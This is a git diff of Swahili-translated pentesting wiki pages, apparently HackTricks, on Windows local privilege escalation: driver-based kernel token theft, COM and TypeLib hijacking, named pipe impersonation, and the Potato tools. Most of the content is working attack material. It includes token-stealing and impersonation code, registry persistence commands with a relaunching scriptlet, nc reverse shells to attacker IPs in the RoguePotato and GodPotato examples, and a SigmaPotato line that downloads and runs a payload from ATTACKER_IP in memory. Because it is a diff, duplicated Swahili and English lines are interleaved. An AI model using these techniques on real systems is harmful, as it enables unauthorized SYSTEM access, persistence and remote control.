7) Mchakato wako wa sasa sasa ni SYSTEM. Hiari, anzisha cmd.exe mpya au powershell.exe kuthibitisha.
## Pseudocode
Chini ni skeleton inayotumia tu IOCTL mbili kutoka kwa driver dhaifu, mojawapo kwa 8-byte kernel read na mojawapo kwa 8-byte kernel write. Badilisha na interface ya driver yako.
Below is a skeleton that only uses two IOCTLs from a vulnerable driver, one for 8-byte kernel read and one for 8-byte kernel write. Replace with your drivers interface.
```c
#include <Windows.h>
#include <Psapi.h>
@ -106,16 +106,16 @@ return 0;
}
```
Vidokezo:
- Offsets: Tumia WinDbgs `dt nt!_EPROCESS` na PDBs za lengo, au runtime symbol loader, ili kupata offsets sahihi. Usifanye hardcode bila tahadhari.
- Mask: On x64 the token is an EX_FAST_REF; low 3 bits are reference count bits. Kuendelea na low bits za asili kutoka token yako kuepuka matatizo ya refcount mara moja.
- Stability: Pendelea kuinua current process; ikiwa unainua helper mfupi unaweza kupoteza SYSTEM anapoondoka.
- Ofseti: Tumia WinDbgs `dt nt!_EPROCESS` pamoja na PDBs za lengo, au runtime symbol loader, kupata ofseti sahihi. Usiyaharcode bila kufikiri.
- Mask: Kwenye x64 token ni EX_FAST_REF; low 3 bits ni reference count bits. Kuhifadhi low bits za asili kutoka kwa token yako kunazuia inconsistent refcount mara moja.
- Utulivu: Pendelea kuinua mchakato wa sasa; ikiwa utaelevate helper mfupi-muda unaweza kupoteza SYSTEM anapoondoka.
## Ugunduzi na kupunguza
- Kupakia unsigned au untrusted thirdparty drivers ambazo zinaonyesha IOCTLs zenye nguvu ndizo chanzo cha tatizo.
- Kernel Driver Blocklist (HVCI/CI), DeviceGuard, and Attack Surface Reduction rules zinaweza kuzuia vulnerable drivers kupakiwa.
- EDR inaweza kuangalia mfululizo wa IOCTL unaoshukiwa ambao unatekeleza arbitrary read/write na token swaps.
## Utambuzi & mitigation
- Kupakia madereva ya thirdparty yasiyotiwa saini au yasiyothibitishwa yanayofunua IOCTLs zenye nguvu ndicho chanzo kikuu.
- Kernel Driver Blocklist (HVCI/CI), DeviceGuard, and Attack Surface Reduction rules zinaweza kuzuia madereva yaliyo hatarishi kupakia.
- EDR inaweza kusubiri mfululizo wa suspicious IOCTLs ambazo zinaimplement arbitrary read/write na token swaps.
## Marejeleo
## References
- [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html)
- [FuzzySecurity Windows Kernel ExploitDev (token stealing examples)](https://www.fuzzysecurity.com/tutorials/expDev/17.html)

32
src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
View File

@ -4,21 +4,21 @@
### Kutafuta vipengele vya COM visivyopo
Kama thamani za HKCU zinaweza kubadilishwa na watumiaji, **COM Hijacking** inaweza kutumika kama **mbinu za kudumu**. Kutumia `procmon` ni rahisi kupata rejista za COM zilizoombwa ambazo hazipo na ambazo mshambuliaji anaweza kuziunda ili kudumu. Vichujio:
Kwa kuwa thamani za HKCU zinaweza kubadilishwa na watumiaji, **COM Hijacking** inaweza kutumika kama **mbinu za kudumu**. Kwa kutumia `procmon` ni rahisi kupata rejista za COM zinazotafutwa ambazo hazipo ambazo mshambuliaji angeweza kuunda ili kudumu. Vichujio:
- **RegOpenKey** operations.
- **RegOpenKey** operesheni.
- ambapo _Result_ ni **NAME NOT FOUND**.
- na _Path_ inamalizika na **InprocServer32**.
- na _Path_ inaishia na **InprocServer32**.
Mara uamapoamua ni COM gani isiyokuwepo kuigiza, tekeleza amri zifuatazo. _Angalia kwa uangalifu ikiwa utaamua kuiga COM ambayo inapakiwa kila sekunde chache kwani hiyo inaweza kuwa ya kupitiliza._
Ukishamua COM isiyokuwepo unayotaka kuiga, tekeleza amri zifuatazo. _Kuwa mwangalifu ikiwa utaamua kuiga COM inayopakiwa kila sekunde chache kwani inaweza kuwa ya ziada._
```bash
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
```
### Hijackable Task Scheduler COM components
### Vipengele vya COM vya Task Scheduler vinavyoweza kuporwa
Windows Tasks zinatumia Custom Triggers kuita COM objects, na kwa sababu zinaendeshwa kupitia Task Scheduler, ni rahisi kutabiri lini zitaanzishwa.
Windows Tasks hutumia Custom Triggers kuwaita COM objects, na kwa sababu zinaendeshwa kupitia Task Scheduler, ni rahisi kutabiri lini zitaamshwa.
<pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs
$Tasks = Get-ScheduledTask
@ -49,9 +49,9 @@ Write-Host
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
# [more like the previous one...]</code></pre>
Ukikagua matokeo unaweza kuchagua moja ambayo itaendeshwa **kila wakati mtumiaji anapoingia** kwa mfano.
Ukikagua matokeo unaweza kuchagua ile ambayo itaendeshwa **kila wakati mtumiaji anapoingia** kwa mfano.
Sasa unapochunguza CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** katika **HKEY\CLASSES\ROOT\CLSID** na katika HKLM na HKCU, kawaida utagundua kwamba thamani haipo katika HKCU.
Sasa ukiyatafuta CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** katika **HKEY\CLASSES\ROOT\CLSID** na katika HKLM na HKCU, kawaida utagundua kuwa thamani hiyo haipo katika HKCU.
```bash
# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
@ -72,32 +72,32 @@ Name Property
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
```
Kisha, unaweza tu kuunda kiingilio cha HKCU na kila mtumiaji anapoingia, backdoor yako itaanzishwa.
Kisha, unaweza kuunda tu entry ya HKCU na kila mara mtumiaji atakapojisajili, backdoor yako itatekelezwa.
---
## COM TypeLib Hijacking (script: moniker persistence)
Type Libraries (TypeLib) zinaelezea COM interfaces na zinaingizwa kupitia `LoadTypeLib()`. Wakati COM server inapoanzishwa, OS pia inaweza kuingiza TypeLib inayohusiana kwa kushauriana na funguo za rejista chini ya `HKCR\TypeLib\{LIBID}`. Ikiwa njia ya TypeLib itabadilishwa na **moniker**, mfano `script:C:\...\evil.sct`, Windows itatekeleza scriptlet wakati TypeLib inapogunduliwa — na kusababisha persistence ya kimyakimya inayochochewa wakati vipengele vya kawaida vinapoguswa.
Type Libraries (TypeLib) hueleza interfaces za COM na zinapakiwa kupitia `LoadTypeLib()`. Wakati COM server inapojengwa, OS pia inaweza kupakia TypeLib inayohusiana kwa kuangalia vigezo vya rejista chini ya `HKCR\TypeLib\{LIBID}`. Ikiwa njia ya TypeLib itabadilishwa kuwa **moniker**, mfano `script:C:\...\evil.sct`, Windows itatekeleza scriptlet wakati TypeLib itakapotatuliwa — ikitoa uendelevu wa kimfichoni unaochochewa wakati vipengele vya kawaida vinapoguswa.
Hii imeonekana dhidi ya Microsoft Web Browser control (inayoingizwa mara kwa mara na Internet Explorer, programu zinazojumuisha WebBrowser, na hata `explorer.exe`).
Hii imeonekana dhidi ya Microsoft Web Browser control (kinachopakiwa mara kwa mara na Internet Explorer, programu zinazojumuisha WebBrowser, na hata `explorer.exe`).
### Hatua (PowerShell)
1) Tambua TypeLib (LIBID) inayotumiwa na CLSID inayotumika mara kwa mara. Mfano wa CLSID unaotumika mara nyingi na minyororo ya malware: {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B} (Microsoft Web Browser).
1) Tambua TypeLib (LIBID) inayotumika na CLSID inayotumika mara kwa mara. Mfano wa CLSID unaotumiwa mara nyingi na malware chains: `{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}` (Microsoft Web Browser).
```powershell
$clsid = '{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}'
$libid = (Get-ItemProperty -Path "Registry::HKCR\\CLSID\\$clsid\\TypeLib").'(default)'
$ver = (Get-ChildItem "Registry::HKCR\\TypeLib\\$libid" | Select-Object -First 1).PSChildName
"CLSID=$clsid LIBID=$libid VER=$ver"
```
2) Elekeza njia ya TypeLib ya mtumiaji mmoja kwa scriptlet ya ndani ukitumia moniker `script:` (no admin rights required):
2) Elekeza per-user TypeLib path kwa scriptlet ya ndani kwa kutumia moniker ya `script:` (haitaji ruhusa za admin):
```powershell
$dest = 'C:\\ProgramData\\Udate_Srv.sct'
New-Item -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Force | Out-Null
Set-ItemProperty -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Name '(default)' -Value "script:$dest"
```
3) Drop JScript `.sct` ndogo kabisa inayowasha tena primary payload yako (kwa mfano `.lnk` inayotumiwa na initial chain):
3) Weka JScript `.sct` ndogo inayoiendesha tena payload yako kuu (kwa mfano `.lnk` inayotumika katika mnyororo wa awali):
```xml
<?xml version="1.0"?>
<scriptlet>
@ -114,7 +114,7 @@ sh.Run(cmd, 0, false);
</script>
</scriptlet>
```
4) Kuchochea kufungua IE, programu inayojumuisha WebBrowser control, au hata shughuli za kawaida za Explorer zitapakia TypeLib na kutekeleza scriptlet, zikirejesha mnyororo wako wakati wa logon/reboot.
4) Kusababisha kufungua IE, au programu inayojumuisha WebBrowser control, au hata shughuli za kawaida za Explorer zitaleta TypeLib na kutekeleza scriptlet, kuwasha tena mnyororo wako wakati wa logon/reboot.
Usafishaji
```powershell
@ -124,7 +124,7 @@ Remove-Item -Recurse -Force "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver" 2>$n
Remove-Item -Force 'C:\\ProgramData\\Udate_Srv.sct' 2>$null
```
Vidokezo
- Unaweza kutumia mantiki ile ile kwa COM components nyingine zinazotumika mara kwa mara; daima pata `LIBID` halisi kutoka `HKCR\CLSID\{CLSID}\TypeLib` kwanza.
- Unaweza kutumia mantiki sawa kwenye komponenti nyingine za COM zinazotumika sana; daima pata `LIBID` halisi kutoka `HKCR\CLSID\{CLSID}\TypeLib` kwanza.
- Kwenye mifumo ya 64-bit unaweza pia kujaza subkey ya `win64` kwa watumiaji wa 64-bit.
## Marejeo

74
src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md
View File

@ -1,30 +1,30 @@
# Named Pipe Client Impersonation
# Uigaji wa Mteja wa Named Pipe
{{#include ../../banners/hacktricks-training.md}}
Named Pipe client impersonation ni primitive ya local privilege escalation inayoruhusu thread ya server ya named-pipe kuchukua muktadha wa usalama wa mteja anayounganisha nayo. Kwa vitendo, mwasi ambaye anaweza kuendesha msimbo akiwa na SeImpersonatePrivilege anaweza kuwalazimisha mteja mwenye heshima (kwa mfano, SYSTEM service) kuungana na pipe inayoendeshwa na mwasi, kuita ImpersonateNamedPipeClient, kunakili token iliyopatikana kuwa primary token, na kuanzisha mchakato kama mteja (mara nyingi NT AUTHORITY\SYSTEM).
Uigaji wa mteja wa Named Pipe ni mbinu ya msingi ya kupandisha hadhi za eneo (local privilege escalation) inayoruhusu thread ya server ya named-pipe kuchukua muktadha wa usalama wa mteja anayeungana nayo. Katika vitendo, mshambulizi anayeweza kuendesha msimbo akiwa na SeImpersonatePrivilege anaweza kulazimisha mteja mwenye ruhusa (mfano, service ya SYSTEM) kuungana na pipe inayodhibitiwa na mshambulizi, kuitisha ImpersonateNamedPipeClient, kutengeneza nakala ya token iliyopatikana kuwa token kuu, na kuanzisha mchakato kama mteja (mara nyingi NT AUTHORITY\SYSTEM).
Ukurasa huu unalenga mbinu kuu. Kwa chains za exploit kutoka mwanzo mpaka mwisho zinazomfanya SYSTEM kuungana na pipe yako, ona kurasa za familia ya Potato zilizotajwa hapa chini.
Ukurasa huu unalenga mbinu kuu. Kwa minyororo ya eksploit kuanzia mwanzo hadi mwisho zinazolazimisha SYSTEM kuungana na pipe yako, angalia Potato family pages zilizotajwa hapa chini.
## Muhtasari (TL;DR)
- Tengeneza named pipe: \\.\pipe\<random> na subiri muunganisho.
- Fanya sehemu yenye heshima iungane nayo (spooler/DCOM/EFSRPC/etc.).
- Soma angalau ujumbe mmoja kutoka kwa pipe, kisha ita ImpersonateNamedPipeClient.
- Fungua impersonation token kutoka kwa thread ya sasa, DuplicateTokenEx(TokenPrimary), na CreateProcessWithTokenW/CreateProcessAsUser kupata mchakato wa SYSTEM.
## TL;DR
- Create a named pipe: \\.\pipe\<random> na subiri muunganisho.
- Fanya sehemu yenye ruhusa iungane nayo (spooler/DCOM/EFSRPC/etc.).
- Soma angalau ujumbe mmoja kutoka kwenye pipe, kisha ita ImpersonateNamedPipeClient.
- Fungua token ya uigaji kutoka thread ya sasa, DuplicateTokenEx(TokenPrimary), na CreateProcessWithTokenW/CreateProcessAsUser ili kupata mchakato wa SYSTEM.
## Mahitaji na APIs muhimu
- Ruhusa zinazohitajika kawaida na process/thread inayoiita:
- SeImpersonatePrivilege ili kufanikiwa kujifanya mteja anayounganisha na kutumia CreateProcessWithTokenW.
- Vinginevyo, baada ya kujifanya SYSTEM, unaweza kutumia CreateProcessAsUser, ambayo inaweza kuhitaji SeAssignPrimaryTokenPrivilege na SeIncreaseQuotaPrivilege (hizi zinatimizwa unapokuwa unajifanya SYSTEM).
- APIs kuu zinazotumika:
## Requirements and key APIs
- PrivilegesTypically needed by the calling process/thread:
- SeImpersonatePrivilege to successfully impersonate a connecting client and to use CreateProcessWithTokenW.
- Alternatively, after impersonating SYSTEM, you can use CreateProcessAsUser, which may require SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege (these are satisfied when youre impersonating SYSTEM).
- Core APIs used:
- CreateNamedPipe / ConnectNamedPipe
- ReadFile/WriteFile (inabidi usome angalau ujumbe mmoja kabla ya kujifanya)
- ReadFile/WriteFile (must read at least one message before impersonation)
- ImpersonateNamedPipeClient and RevertToSelf
- OpenThreadToken, DuplicateTokenEx(TokenPrimary)
- CreateProcessWithTokenW or CreateProcessAsUser
- Kiwango cha impersonation: ili kufanya vitendo vinavyofaa kwa lokali, mteja lazima aruhusu SecurityImpersonation (chaguo-msingi kwa RPC/named-pipe clients wengi). Wateja wanaweza kupunguza hili kwa SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION wakati wa kufungua pipe.
- Impersonation level: to perform useful actions locally, the client must allow SecurityImpersonation (default for many local RPC/named-pipe clients). Clients can lower this with SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION when opening the pipe.
## Minimal Win32 workflow (C)
## Mtiririko mdogo wa Win32 (C)
```c
// Minimal skeleton (no error handling hardening for brevity)
#include <windows.h>
@ -68,12 +68,12 @@ RevertToSelf(); // Restore original context
return 0;
}
```
Notes:
- Iwapo ImpersonateNamedPipeClient itarudisha ERROR_CANNOT_IMPERSONATE (1368), hakikisha unasoma kwanza kutoka kwenye pipe na kwamba client hakuzuia impersonation kwa Identification level.
- Pendelea DuplicateTokenEx pamoja na SecurityImpersonation na TokenPrimary ili kuunda primary token inayofaa kwa process creation.
Vidokezo:
- Ikiwa ImpersonateNamedPipeClient inarudisha ERROR_CANNOT_IMPERSONATE (1368), hakikisha unasoma kutoka kwenye pipe kwanza na kwamba client hakuzuia impersonation hadi kiwango cha Identification.
- Pendelea DuplicateTokenEx kwa SecurityImpersonation na TokenPrimary ili kuunda token kuu inayofaa kwa uundaji wa mchakato.
## .NET mfano mfupi
Katika .NET, NamedPipeServerStream inaweza impersonate kupitia RunAsClient. Ukishaanza impersonate, duplicate thread token kisha unda mchakato.
Katika .NET, NamedPipeServerStream inaweza kujifanya kupitia RunAsClient. Mara inapojifanya, nakili token ya thread na unda mchakato.
```csharp
using System; using System.IO.Pipes; using System.Runtime.InteropServices; using System.Diagnostics;
class P {
@ -93,13 +93,13 @@ Process pi; CreateProcessWithTokenW(p, 2, null, null, 0, IntPtr.Zero, null, ref
}
}
```
## Vichocheo/vitalamisho vya kawaida vya kumfanya SYSTEM kuungane na pipe yako
Mbinu hizi hulazimisha huduma zenye vibali kuungana na named pipe yako ili uweze kujifanya kuwa wao:
- Print Spooler RPC trigger (PrintSpoofer)
- DCOM activation/NTLM reflection variants (RoguePotato/JuicyPotato[NG], GodPotato)
## Vichocheo/vikandamizo vya kawaida ili kupata SYSTEM kwenye pipe yako
Mbinu hizi zinawalazimisha huduma zilizo na vibali (privileged services) kuungana na named pipe yako ili uweze kujifanya wao:
- Print Spooler RPC kichocheo (PrintSpoofer)
- Variant za DCOM activation/NTLM reflection (RoguePotato/JuicyPotato[NG], GodPotato)
- EFSRPC pipes (EfsPotato/SharpEfsPotato)
See detailed usage and compatibility here:
Angalia utumiaji wa kina na ulinganifu hapa:
-
{{#ref}}
@ -110,27 +110,27 @@ roguepotato-and-printspoofer.md
juicypotato.md
{{#endref}}
If you just need a full example of crafting the pipe and impersonating to spawn SYSTEM from a service trigger, see:
Ikiwa unahitaji mfano kamili wa kutengeneza pipe na kujifanya ili kuzalisha SYSTEM kutoka kwa kichocheo cha huduma, angalia:
-
{{#ref}}
from-high-integrity-to-system-with-name-pipes.md
{{#endref}}
## Utatuzi wa matatizo na mambo ya tahadhari
- Lazima usome angalau ujumbe mmoja kutoka kwenye pipe kabla ya kuita ImpersonateNamedPipeClient; vinginevyo utapata ERROR_CANNOT_IMPERSONATE (1368).
- Iwapo client itaungana kwa SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION, server haiwezi kujifanya kwa ukamilifu; angalia kiwango cha impersonation cha token kupitia GetTokenInformation(TokenImpersonationLevel).
- CreateProcessWithTokenW inahitaji SeImpersonatePrivilege kwenye anayeita. Ikiwa hilo linashindwa kwa ERROR_PRIVILEGE_NOT_HELD (1314), tumia CreateProcessAsUser baada ya tayari kujifanya kuwa SYSTEM.
- Hakikisha security descriptor ya pipe yako inamruhusu huduma lengwa kuungana ikiwa umeimarisha; kwa kawaida, pipes chini ya \\.\pipe zinapatikana kulingana na DACL ya server.
## Utatuzi wa matatizo na vidokezo muhimu
- Lazima usome angalau ujumbe mmoja kutoka kwa pipe kabla ya kuita ImpersonateNamedPipeClient; vinginevyo utapokea ERROR_CANNOT_IMPERSONATE (1368).
- Ikiwa client inaungana kwa SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION, server haiwezi kujifanya kikamilifu; angalia kiwango cha kujifanya cha token kupitia GetTokenInformation(TokenImpersonationLevel).
- CreateProcessWithTokenW inahitaji SeImpersonatePrivilege kwa mtumaji. Ikiwa hiyo inashindwa na ERROR_PRIVILEGE_NOT_HELD (1314), tumia CreateProcessAsUser baada ya tayari kujifanya SYSTEM.
- Hakikisha security descriptor ya pipe yako inamruhusu huduma inayolengwa kuungana ikiwa umeifanya kuwa ngumu; kwa default, pipes chini ya \\.\pipe zinapatikana kwa mujibu wa DACL ya server.
## Utambuzi na uimarishaji
- Fuatilia uundaji wa named pipe na miunganisho. Sysmon Event IDs 17 (Pipe Created) na 18 (Pipe Connected) ni muhimu kuanzisha orodha ya majina ya pipe halali na kugundua pipes zisizo za kawaida, zinazoonekana nasibu kabla ya matukio ya urekebishaji token.
- Tafuta mfululizo: mchakato unaunda pipe, huduma ya SYSTEM inaungana, kisha mchakato uliounda unazalisha mchakato mtoto kama SYSTEM.
- Punguza uwekaji hatarini kwa kuondoa SeImpersonatePrivilege kutoka kwa akaunti za huduma zisizo za lazima na kuepuka kuingia kwa huduma zisizo za lazima zenye ruhusa za juu.
- Maendeleo ya kujilinda: unapotumia kuungana na named pipes zisizo za kuaminika, bainisha SECURITY_SQOS_PRESENT na SECURITY_IDENTIFICATION ili kuzuia server kujifanya kabisa client isipokuwa inapohitajika.
## Ugunduzi na kuimarisha
- Fuatilia uundaji na muunganisho wa named pipe. Sysmon Event IDs 17 (Pipe Created) na 18 (Pipe Connected) ni muhimu kuanzisha mstari wa msingi wa majina halali ya pipe na kugundua pipes zisizo za kawaida zinazoonekana kuwa za nasibu kabla ya matukio ya utendakazi wa token.
- Tafuta mfululizo: mchakato unaunda pipe, huduma ya SYSTEM inaunda muunganisho, kisha mchakato uliounda unazalisha mchakato mtoto kama SYSTEM.
- Punguza mfao kwa kuondoa SeImpersonatePrivilege kutoka kwa akaunti za huduma zisizo za lazima na kuepuka kuingia kwa huduma zisizo za lazima zenye vibali vya juu.
- Maendeleo ya kujilinda: wakati wa kuungana na named pipes zisizo za kuaminika, taja SECURITY_SQOS_PRESENT pamoja na SECURITY_IDENTIFICATION ili kuzuia servers kujifanya kikamilifu client isipokuwa inapohitajika.
## Marejeo
- Windows: ImpersonateNamedPipeClient documentation (mahitaji na tabia za impersonation). https://learn.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-impersonatenamedpipeclient
- Windows: ImpersonateNamedPipeClient documentation (mahitaji ya kujifanya na tabia). https://learn.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-impersonatenamedpipeclient
- ired.team: Windows named pipes privilege escalation (mwongozo na mifano ya code). https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation
{{#include ../../banners/hacktricks-training.md}}

50
src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
View File

@ -3,10 +3,10 @@
{{#include ../../banners/hacktricks-training.md}}
> [!WARNING]
> **JuicyPotato haifanyi kazi** kwenye Windows Server 2019 na Windows 10 build 1809 na baadaye. Hata hivyo, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** zinaweza kutumika kupata vibali sawa na kupata upatikanaji wa ngazi ya `NT AUTHORITY\SYSTEM`. Posti hii ya blogi (https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) inachunguza kwa kina zana ya `PrintSpoofer`, ambayo inaweza kutumika kuabusu vibali vya kuiga (impersonation) kwenye mashine za Windows 10 na Server 2019 ambapo JuicyPotato haifanyi kazi tena.
> **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
> [!TIP]
> Chaguo la kisasa linalodumishwa mara kwa mara katika 20242025 ni SigmaPotato (fork ya GodPotato) ambalo linaongeza matumizi ya in-memory/.NET reflection na msaada wa OS uliopanuliwa. Angalia matumizi ya haraka hapa chini na repo katika References.
> A modern alternative frequently maintained in 20242025 is SigmaPotato (a fork of GodPotato) which adds in-memory/.NET reflection usage and extended OS support. See quick usage below and the repo in References.
Related pages for background and manual techniques:
@ -22,23 +22,23 @@ from-high-integrity-to-system-with-name-pipes.md
privilege-escalation-abusing-tokens.md
{{#endref}}
## Mahitaji na mambo ya kuzingatia
## Requirements and common gotchas
Mbinu zote zinazofuata zinategemea kuabusu huduma yenye uwezo wa kuiga (impersonation-capable) yenye vibali kutoka kwa muktadha unaoshikilia moja ya vibali vifuatavyo:
All the following techniques rely on abusing an impersonation-capable privileged service from a context holding either of these privileges:
- SeImpersonatePrivilege (ya kawaida zaidi) au SeAssignPrimaryTokenPrivilege
- High integrity haitegemeeki ikiwa token tayari ina SeImpersonatePrivilege (kawaida kwa akaunti nyingi za service kama IIS AppPool, MSSQL, n.k.)
- SeImpersonatePrivilege (maarufu zaidi) or SeAssignPrimaryTokenPrivilege
- Ngazi ya uaminifu ya juu haitegemeeki ikiwa token tayari ina SeImpersonatePrivilege (kawaida kwa akaunti za huduma nyingi kama IIS AppPool, MSSQL, n.k.)
Angalia vibali haraka:
Check privileges quickly:
```cmd
whoami /priv | findstr /i impersonate
```
Vidokezo vya uendeshaji:
Operational notes:
- PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). Katika mazingira yaliyothibitishwa kwa usalama ambapo Spooler imezimwa baada ya PrintNightmare, pendelea RoguePotato/GodPotato/DCOMPotato/EfsPotato.
- RoguePotato requires an OXID resolver reachable on TCP/135. Ikiwa egress imezuiwa, tumia redirector/port-forwarder (see example below). Older builds needed the -f flag.
- EfsPotato/SharpEfsPotato hutumia MS-EFSR; ikiwa pipe moja imezuiwa, jaribu pipes mbadala (lsarpc, efsrpc, samr, lsass, netlogon).
- Kosa 0x6d3 wakati wa RpcBindingSetAuthInfo kawaida inaonyesha huduma ya uthibitishaji ya RPC isiyojulikana/isiyoungwa mkono; jaribu pipe/transport tofauti au hakikisha huduma ya lengo inaendeshwa.
- PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). In hardened environments where Spooler is disabled post-PrintNightmare, prefer RoguePotato/GodPotato/DCOMPotato/EfsPotato.
- RoguePotato requires an OXID resolver reachable on TCP/135. If egress is blocked, use a redirector/port-forwarder (see example below). Older builds needed the -f flag.
- EfsPotato/SharpEfsPotato abuse MS-EFSR; if one pipe is blocked, try alternative pipes (lsarpc, efsrpc, samr, lsass, netlogon).
- Error 0x6d3 during RpcBindingSetAuthInfo typically indicates an unknown/unsupported RPC authentication service; try a different pipe/transport or ensure the target service is running.
## Demo ya Haraka
@ -58,7 +58,7 @@ NULL
```
Vidokezo:
- Unaweza kutumia -i kuzindua mchakato wa mwingiliano katika console ya sasa, au -c kuendesha one-liner.
- Unaweza kutumia -i kuanzisha interactive process kwenye current console, au -c kuendesha one-liner.
- Inahitaji Spooler service. Ikiwa imezimwa, hii itashindwa.
### RoguePotato
@ -67,7 +67,7 @@ c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
Ikiwa outbound 135 imezuiwa, pivot OXID resolver kupitia socat kwenye redirector yako:
Ikiwa outbound 135 imezuiwa, pivot the OXID resolver kupitia socat kwenye redirector yako:
```bash
# On attacker redirector (must listen on TCP/135 and forward to victim:9999)
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
@ -111,7 +111,7 @@ CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes su
nt authority\system
```
Kidokezo: Ikiwa pipe moja itashindwa au EDR itazuia, jaribu pipes nyingine zinazounga mkono:
Kidokezo: Ikiwa pipe moja inashindwa au EDR inaizuia, jaribu pipes nyingine zinazoungwa mkono:
```text
EfsPotato <cmd> [pipe]
pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
@ -123,13 +123,13 @@ pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```
Vidokezo:
- Inafanya kazi kwenye Windows 8/8.111 na Server 20122022 wakati SeImpersonatePrivilege ipo.
- Inafanya kazi katika Windows 8/8.111 na Server 20122022 wakati SeImpersonatePrivilege ipo.
### DCOMPotato
![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)
DCOMPotato inatoa aina mbili zinazolenga obyekti za DCOM za huduma ambazo kwa chaguo-msingi huwa na RPC_C_IMP_LEVEL_IMPERSONATE. Jenga au tumia binaries zilizotolewa na endesha amri yako:
DCOMPotato inatoa matoleo mawili zinazolenga service DCOM objects ambazo kwa chaguo-msingi huweka RPC_C_IMP_LEVEL_IMPERSONATE. Jenga au tumia binaries zilizotolewa kisha endesha amri yako:
```cmd
# PrinterNotify variant
PrinterNotifyPotato.exe "cmd /c whoami"
@ -137,9 +137,9 @@ PrinterNotifyPotato.exe "cmd /c whoami"
# McpManagementService variant (Server 2022 also)
McpManagementPotato.exe "cmd /c whoami"
```
### SigmaPotato (tawi la GodPotato lililosasishwa)
### SigmaPotato (imeboreshwa fork ya GodPotato)
SigmaPotato inaongeza vipengele vya kisasa kama in-memory execution kupitia .NET reflection na msaidizi wa PowerShell reverse shell.
SigmaPotato inaongeza vipengele vya kisasa kama in-memory execution kwa kutumia .NET reflection na PowerShell reverse shell helper.
```powershell
# Load and execute from memory (no disk touch)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
@ -148,13 +148,13 @@ SigmaPotato inaongeza vipengele vya kisasa kama in-memory execution kupitia .NET
# Or ask it to spawn a PS reverse shell
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
```
## Vidokezo vya utambuzi na kuimarisha usalama
## Vidokezo vya ugundaji na kuimarisha
